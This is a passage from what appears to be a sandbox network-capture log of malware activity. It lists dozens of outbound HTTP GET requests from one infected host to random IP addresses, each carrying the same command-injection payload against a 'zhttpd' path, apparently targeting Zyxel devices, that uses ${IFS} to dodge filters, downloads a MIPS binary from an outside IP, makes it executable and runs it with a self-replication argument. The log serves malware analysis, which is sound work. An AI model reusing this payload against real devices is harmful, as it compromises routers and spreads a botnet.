                                          Jan 14, 2024 15:46:24.143599033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6193192.168.2.2356952115.63.180.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143640995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6194192.168.2.2360858150.38.21.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143681049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6195192.168.2.2336206137.146.219.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143729925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6196192.168.2.2351514114.51.255.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143795013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6197192.168.2.234287214.16.60.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143815041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6198192.168.2.2356438101.215.30.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143842936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6199192.168.2.233976099.149.161.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143903017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6200192.168.2.2334424213.91.254.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143954992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6201192.168.2.2347160200.181.159.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143991947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6202192.168.2.2339904134.177.38.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144047976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6203192.168.2.2336464194.144.209.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144053936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6204192.168.2.23587884.207.149.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144085884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6205192.168.2.2338730204.83.163.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144118071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6206192.168.2.234820668.107.126.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144140959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6207192.168.2.23586601.187.107.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144207001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6208192.168.2.235298495.181.84.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144263029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6209192.168.2.2341990119.236.201.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144278049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6210192.168.2.234142472.179.158.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144299984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6211192.168.2.233702461.21.233.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144366980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6212192.168.2.2350120171.149.39.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144413948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6213192.168.2.2332856117.195.243.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144428015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6214192.168.2.2338376175.27.80.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144494057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6215192.168.2.235882093.2.106.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144512892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6216192.168.2.2341862137.222.209.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144551039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6217192.168.2.2360968149.95.117.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144592047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6218192.168.2.233822089.219.97.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144634962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6219192.168.2.234903463.173.121.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144691944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6220192.168.2.2354842137.77.195.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144731045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6221192.168.2.2352036140.171.93.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144772053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6222192.168.2.234571819.119.90.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144799948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6223192.168.2.2359932180.148.242.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144828081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6224192.168.2.2346484198.118.106.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144891024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6225192.168.2.233810031.120.96.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144920111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6226192.168.2.2359644142.61.28.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.144974947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6227192.168.2.2337938174.155.189.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145008087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6228192.168.2.234141434.213.111.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145056963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6229192.168.2.233623892.168.75.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145080090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6230192.168.2.2359264122.26.122.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145137072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6231192.168.2.2343908196.115.199.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145158052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6232192.168.2.2341722134.48.243.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145199060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6233192.168.2.233352893.225.47.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145209074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6234192.168.2.233887281.38.230.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145263910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6235192.168.2.233345899.202.238.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145317078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6236192.168.2.236051850.175.144.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145339012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6237192.168.2.235526468.48.10.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145384073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6238192.168.2.2334378220.83.184.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145432949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6239192.168.2.234021251.92.22.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145461082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6240192.168.2.2358024138.136.115.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145504951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6241192.168.2.2360976111.19.162.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145565987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6242192.168.2.2335872223.115.206.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145617008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6243192.168.2.2356504198.193.219.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145632982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6244192.168.2.235133258.98.137.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145669937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6245192.168.2.233443847.231.126.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145706892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6246192.168.2.2340314192.2.183.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145790100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6247192.168.2.2350334114.62.37.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145839930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6248192.168.2.2358886168.63.80.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145839930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6249192.168.2.2334302165.178.225.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145860910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6250192.168.2.2334980167.20.224.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145922899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6251192.168.2.2345564103.246.206.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.145982027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6252192.168.2.2336468157.251.250.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146009922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6253192.168.2.235453048.166.172.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146070004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6254192.168.2.235558696.225.182.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146119118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6255192.168.2.233421065.24.64.26443
                                          TimestampBytes transferredDirectionData
